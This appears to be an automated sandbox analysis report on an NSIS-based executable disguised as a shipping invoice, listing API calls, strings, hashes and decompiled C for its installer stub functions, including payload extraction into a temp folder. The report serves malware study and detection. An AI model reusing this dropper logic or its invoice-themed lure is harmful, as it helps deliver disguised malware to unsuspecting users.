                                                                                                                                    0x0040374a
                                                                                                                                    0x00403752
                                                                                                                                    0x00403752
                                                                                                                                    0x00403760
                                                                                                                                    0x00403765
                                                                                                                                    0x00403777
                                                                                                                                    0x0040377f
                                                                                                                                    0x00403785
                                                                                                                                    0x00403791
                                                                                                                                    0x00403797
                                                                                                                                    0x004037a1
                                                                                                                                    0x004037b7
                                                                                                                                    0x004037c8
                                                                                                                                    0x004037ce
                                                                                                                                    0x004037d5
                                                                                                                                    0x004037d8
                                                                                                                                    0x004037de
                                                                                                                                    0x004037de
                                                                                                                                    0x004037d5
                                                                                                                                    0x004037e2
                                                                                                                                    0x004037e8
                                                                                                                                    0x004037e8
                                                                                                                                    0x004037ed
                                                                                                                                    0x004037ed
                                                                                                                                    0x00000000
                                                                                                                                    0x0040372a
                                                                                                                                    0x0040368a
                                                                                                                                    0x0040368c
                                                                                                                                    0x00403697
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040369f
                                                                                                                                    0x004036aa
                                                                                                                                    0x004036af
                                                                                                                                    0x00000000
                                                                                                                                    0x004036af
                                                                                                                                    0x00403673
                                                                                                                                    0x00403675
                                                                                                                                    0x00403679
                                                                                                                                    0x0040367c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040367c
                                                                                                                                    0x00000000
                                                                                                                                    0x00403675
                                                                                                                                    0x004035c5
                                                                                                                                    0x004035d1
                                                                                                                                    0x004035d6
                                                                                                                                    0x004035db
                                                                                                                                    0x004035dd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004035e5
                                                                                                                                    0x004035ed
                                                                                                                                    0x004035fe
                                                                                                                                    0x00403606
                                                                                                                                    0x00403608
                                                                                                                                    0x0040360d
                                                                                                                                    0x0040360f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040360f
                                                                                                                                    0x00000000
                                                                                                                                    0x00403574
                                                                                                                                    0x00403535
                                                                                                                                    0x00403538
                                                                                                                                    0x0040353b
                                                                                                                                    0x00403541
                                                                                                                                    0x00403541
                                                                                                                                    0x00403541
                                                                                                                                    0x00403541
                                                                                                                                    0x00000000
                                                                                                                                    0x00403541
                                                                                                                                    0x0040353d
                                                                                                                                    0x0040353f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040353f
                                                                                                                                    0x004034f0
                                                                                                                                    0x004034f3
                                                                                                                                    0x004034f6
                                                                                                                                    0x004034fc
                                                                                                                                    0x004034fc
                                                                                                                                    0x00000000
                                                                                                                                    0x004034fc
                                                                                                                                    0x004034f8
                                                                                                                                    0x004034fa
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004034fa
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004034cb
                                                                                                                                    0x004034cb
                                                                                                                                    0x004034cb
                                                                                                                                    0x004034cc
                                                                                                                                    0x004034cc
                                                                                                                                    0x00000000
                                                                                                                                    0x004034cb
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE ref: 004033CE
                                                                                                                                    • GetVersion.KERNEL32 ref: 004033D4
                                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403407
                                                                                                                                    • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403443
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040344A
                                                                                                                                    • SHGetFileInfoA.SHELL32(00429858,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403466
                                                                                                                                    • GetCommandLineA.KERNEL32(Unbound Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040347B
                                                                                                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" ,00000020,"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" ,00000000,?,00000006,00000008,0000000A), ref: 004034B7
                                                                                                                                    • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004035B4
                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C5
                                                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035D1
                                                                                                                                    • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E5
                                                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035ED
                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035FE
                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403606
                                                                                                                                    • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361A
                                                                                                                                      • Part of subcall function 004064FE: GetModuleHandleA.KERNEL32(?,?,?,0040341C,0000000A), ref: 00406510
                                                                                                                                      • Part of subcall function 004064FE: GetProcAddress.KERNEL32(00000000,?), ref: 0040652B
                                                                                                                                      • Part of subcall function 00403983: lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,?,?,?,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,00000000,00435400,1033,0042A898,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A898,00000000,00000002,73BCFA90), ref: 00403A73
                                                                                                                                      • Part of subcall function 00403983: lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,?,?,?,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,00000000,00435400,1033,0042A898,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A898,00000000), ref: 00403A86
                                                                                                                                      • Part of subcall function 00403983: GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent), ref: 00403A91
                                                                                                                                      • Part of subcall function 00403983: LoadImageA.USER32 ref: 00403ADA
                                                                                                                                      • Part of subcall function 00403983: RegisterClassA.USER32 ref: 00403B17
                                                                                                                                    • ExitProcess.KERNEL32(?,?,00000006,00000008,0000000A), ref: 004036C3
                                                                                                                                      • Part of subcall function 00403891: CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,004036C8,?,?,00000006,00000008,0000000A), ref: 004038A3
                                                                                                                                      • Part of subcall function 00403891: CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,004036C8,?,?,00000006,00000008,0000000A), ref: 004038B7
                                                                                                                                    • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004036C8
                                                                                                                                    • ExitProcess.KERNEL32 ref: 004036E9
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403806
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040380D
                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403825
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403844
                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403868
                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040388B
                                                                                                                                      • Part of subcall function 00405882: MessageBoxIndirectA.USER32 ref: 004058DD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$Exit$FileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                                                                    • String ID: "$"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Unbound Setup$\Temp$~nsu
                                                                                                                                    • API String ID: 3766654759-3154804242
                                                                                                                                    • Opcode ID: 2d1791a0c037a7f8e242bac324cf0b3027c210a3f85da8737e33250c6c7e0a3e
                                                                                                                                    • Instruction ID: b27f96f429de507a0928ae33df45924dffe4dfeafea75076cf50583fbdc57f5c
                                                                                                                                    • Opcode Fuzzy Hash: 2d1791a0c037a7f8e242bac324cf0b3027c210a3f85da8737e33250c6c7e0a3e
                                                                                                                                    • Instruction Fuzzy Hash: B4C117701047407AD7216F759E89B2B3EACAB4570AF44443FF581BA1E2CB7C8A15876E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406469, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00406469(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0e8;
			}




                                                                                                                                    0x00406474
                                                                                                                                    0x0040647d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040648a
                                                                                                                                    0x00406480
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileA.KERNELBASE(73BCFA90,0042C0E8,0042BCA0,00405C2F,0042BCA0,0042BCA0,00000000,0042BCA0,0042BCA0,73BCFA90,?,73BCF560,0040594E,?,73BCFA90,73BCF560), ref: 00406474
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00406480
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                    • Opcode ID: 21a83238b307d573e2463cc0b26edaa82db6edf9121fcc6ecb87138002c85e66
                                                                                                                                    • Instruction ID: 8e2f8834f5bb85d2431411804d54fad1933aab715e694091bf3f8c9270f6830b
                                                                                                                                    • Opcode Fuzzy Hash: 21a83238b307d573e2463cc0b26edaa82db6edf9121fcc6ecb87138002c85e66
                                                                                                                                    • Instruction Fuzzy Hash: 41D012316451209FC35017786E4C84F7A589F25331721CB37F8AAF21E0C7758C6686AC
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00403983, Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E00403983(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f434;
				_t17 = E004064FE(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a898;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E0040604D(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a898, 0);
					__eflags =  *0x42a898;
					if(__eflags == 0) {
						E0040604D(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M00408362, 0x42a898, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E004060C4("1033",  *_t17() & 0x0000ffff);
				}
				E00403C48(_t71, _t84);
				 *0x42f4c0 =  *0x42f43c & 0x00000020;
				 *0x42f4dc = 0x10000;
				if(E00405BEC(_t84, 0x435400) != 0) {
					L16:
					if(E00405BEC(_t92, 0x435400) == 0) {
						E00406188(0, _t74, _t76, 0x435400,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ec08 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403C48(_t71, __eflags);
							__eflags =  *0x42f4e0;
							if( *0x42f4e0 != 0) {
								_t28 = E0040535F(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ebec; // 0x1
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a878, 5);
							_t34 = E00406490("RichEd20");
							__eflags = _t34;
							if(_t34 == 0) {
								E00406490("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebc0);
								 *0x42ebe4 = _t81;
								RegisterClassA(0x42ebc0);
							}
							_t36 =  *0x42ec00; // 0x0
							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403D20, 0);
							E004038D3(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f420;
						 *0x42ebc4 = E00401000;
						 *0x42ebd0 =  *0x42f420;
						 *0x42ebd4 = _t25;
						 *0x42ebe4 = 0x40a210;
						if(RegisterClassA(0x42ebc0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a878 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3c0;
					E0040604D(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
					_t57 =  *0x42e3c0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3c1;
						 *((char*)(E00405B29(0x42e3c1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00406166(0x435400, E00405AFE(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405B45(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                                                                    0x00403989
                                                                                                                                    0x00403992
                                                                                                                                    0x00403999
                                                                                                                                    0x0040399b
                                                                                                                                    0x004039af
                                                                                                                                    0x004039c1
                                                                                                                                    0x004039c8
                                                                                                                                    0x004039cf
                                                                                                                                    0x004039d5
                                                                                                                                    0x004039da
                                                                                                                                    0x004039e0
                                                                                                                                    0x004039f3
                                                                                                                                    0x004039f3
                                                                                                                                    0x004039fe
                                                                                                                                    0x0040399d
                                                                                                                                    0x004039a8
                                                                                                                                    0x004039a8
                                                                                                                                    0x00403a03
                                                                                                                                    0x00403a16
                                                                                                                                    0x00403a1b
                                                                                                                                    0x00403a2c
                                                                                                                                    0x00403ab3
                                                                                                                                    0x00403abb
                                                                                                                                    0x00403ac4
                                                                                                                                    0x00403ac4
                                                                                                                                    0x00403ada
                                                                                                                                    0x00403ae0
                                                                                                                                    0x00403aee
                                                                                                                                    0x00403b6f
                                                                                                                                    0x00403b77
                                                                                                                                    0x00403b81
                                                                                                                                    0x00403b86
                                                                                                                                    0x00403b8c
                                                                                                                                    0x00403c16
                                                                                                                                    0x00403c1b
                                                                                                                                    0x00403c1d
                                                                                                                                    0x00403c39
                                                                                                                                    0x00000000
                                                                                                                                    0x00403c39
                                                                                                                                    0x00403c1f
                                                                                                                                    0x00403c25
                                                                                                                                    0x00403c2d
                                                                                                                                    0x00403c2d
                                                                                                                                    0x00000000
                                                                                                                                    0x00403c25
                                                                                                                                    0x00403b9a
                                                                                                                                    0x00403ba5
                                                                                                                                    0x00403baa
                                                                                                                                    0x00403bac
                                                                                                                                    0x00403bb3
                                                                                                                                    0x00403bb3
                                                                                                                                    0x00403bbe
                                                                                                                                    0x00403bc6
                                                                                                                                    0x00403bc8
                                                                                                                                    0x00403bca
                                                                                                                                    0x00403bd3
                                                                                                                                    0x00403bd6
                                                                                                                                    0x00403bdc
                                                                                                                                    0x00403bdc
                                                                                                                                    0x00403be2
                                                                                                                                    0x00403bfb
                                                                                                                                    0x00403c0c
                                                                                                                                    0x00000000
                                                                                                                                    0x00403c11
                                                                                                                                    0x00403b79
                                                                                                                                    0x00403b7b
                                                                                                                                    0x00000000
                                                                                                                                    0x00403af0
                                                                                                                                    0x00403af0
                                                                                                                                    0x00403afc
                                                                                                                                    0x00403b06
                                                                                                                                    0x00403b0c
                                                                                                                                    0x00403b11
                                                                                                                                    0x00403b20
                                                                                                                                    0x00403c3e
                                                                                                                                    0x00403c3e
                                                                                                                                    0x00000000
                                                                                                                                    0x00403c3e
                                                                                                                                    0x00403b2f
                                                                                                                                    0x00403b6a
                                                                                                                                    0x00000000
                                                                                                                                    0x00403b6a
                                                                                                                                    0x00403a32
                                                                                                                                    0x00403a32
                                                                                                                                    0x00403a35
                                                                                                                                    0x00403a37
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403a41
                                                                                                                                    0x00403a51
                                                                                                                                    0x00403a56
                                                                                                                                    0x00403a5d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403a61
                                                                                                                                    0x00403a63
                                                                                                                                    0x00403a70
                                                                                                                                    0x00403a70
                                                                                                                                    0x00403a78
                                                                                                                                    0x00403a7e
                                                                                                                                    0x00403aa6
                                                                                                                                    0x00403aae
                                                                                                                                    0x00000000
                                                                                                                                    0x00403a90
                                                                                                                                    0x00403a91
                                                                                                                                    0x00403a9a
                                                                                                                                    0x00403aa0
                                                                                                                                    0x00403aa1
                                                                                                                                    0x00000000
                                                                                                                                    0x00403aa1
                                                                                                                                    0x00403a9c
                                                                                                                                    0x00403a9e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403a9e
                                                                                                                                    0x00403a7e

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004064FE: GetModuleHandleA.KERNEL32(?,?,?,0040341C,0000000A), ref: 00406510
                                                                                                                                      • Part of subcall function 004064FE: GetProcAddress.KERNEL32(00000000,?), ref: 0040652B
                                                                                                                                    • lstrcatA.KERNEL32(1033,0042A898,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A898,00000000,00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" ,00000000), ref: 004039FE
                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,?,?,?,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,00000000,00435400,1033,0042A898,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A898,00000000,00000002,73BCFA90), ref: 00403A73
                                                                                                                                    • lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,?,?,?,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,00000000,00435400,1033,0042A898,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A898,00000000), ref: 00403A86
                                                                                                                                    • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent), ref: 00403A91
                                                                                                                                    • LoadImageA.USER32 ref: 00403ADA
                                                                                                                                      • Part of subcall function 004060C4: wsprintfA.USER32 ref: 004060D1
                                                                                                                                    • RegisterClassA.USER32 ref: 00403B17
                                                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403B2F
                                                                                                                                    • CreateWindowExA.USER32 ref: 00403B64
                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403B9A
                                                                                                                                    • GetClassInfoA.USER32 ref: 00403BC6
                                                                                                                                    • GetClassInfoA.USER32 ref: 00403BD3
                                                                                                                                    • RegisterClassA.USER32 ref: 00403BDC
                                                                                                                                    • DialogBoxParamA.USER32 ref: 00403BFB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                    • API String ID: 1975747703-3928170452
                                                                                                                                    • Opcode ID: 11e40e81066751d087b9ff3905231488129d51ce77e2f765c8d4af6575c4c7bc
                                                                                                                                    • Instruction ID: b26d75f66471b6ab4bde28a110228d97be13954c1219befa950aae33cc908ec8
                                                                                                                                    • Opcode Fuzzy Hash: 11e40e81066751d087b9ff3905231488129d51ce77e2f765c8d4af6575c4c7bc
                                                                                                                                    • Instruction Fuzzy Hash: 3861F6712442007ED620AF669D46F273ABCDB54749F80003FF941B62E2CB7CAD068A2D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00402E14, Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 208memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E00402E14(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t100;
				signed int _t102;
				void* _t104;
				signed int _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42f430 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\Shipping INVOICE-BL Shipment..exe", 0x400);
				_t104 = E00405CFF("C:\\Users\\jones\\Desktop\\Shipping INVOICE-BL Shipment..exe", 0x80000000, 3);
				 *0x40a018 = _t104;
				if(_t104 == 0xffffffff) {
					return "Error launching installer";
				}
				E00406166("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\Shipping INVOICE-BL Shipment..exe");
				E00406166(0x437000, E00405B45("C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t104, 0);
				__eflags = _t54;
				 *0x429450 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402D75(1);
					__eflags =  *0x42f438;
					if( *0x42f438 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						_t105 = 8;
						 *0x415438 = 0x40d430;
						 *0x415434 = 0x40d430;
						 *0x40b890 = _t105;
						 *0x40bdac = 0;
						 *0x40bda8 = 0;
						 *0x415430 = 0x415430; // executed
						E00405D2E( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403361( *0x42f438 + 0x1c);
							 *0x429454 = _t65;
							 *0x429448 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E004030DA(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x42f434 = _t110;
								 *0x42f43c =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42f440 =  *0x42f440 + 1;
									__eflags =  *0x42f440;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t100 = _t105;
								do {
									_t70 = _t70 - _t105;
									 *_t70 =  *_t70 + _t110;
									_t100 = _t100 - 1;
									__eflags = _t100;
								} while (_t100 != 0);
								_t71 =  *0x429444; // 0xa0970
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E00405CBA(0x42f460, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403361( *0x429440);
					_t77 = E0040334B( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E0040334B(0x421440, _t106);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402D75(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42f438;
						if( *0x42f438 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402D75(0);
							}
							goto L19;
						}
						E00405CBA( &_v40, 0x421440, 0x1c);
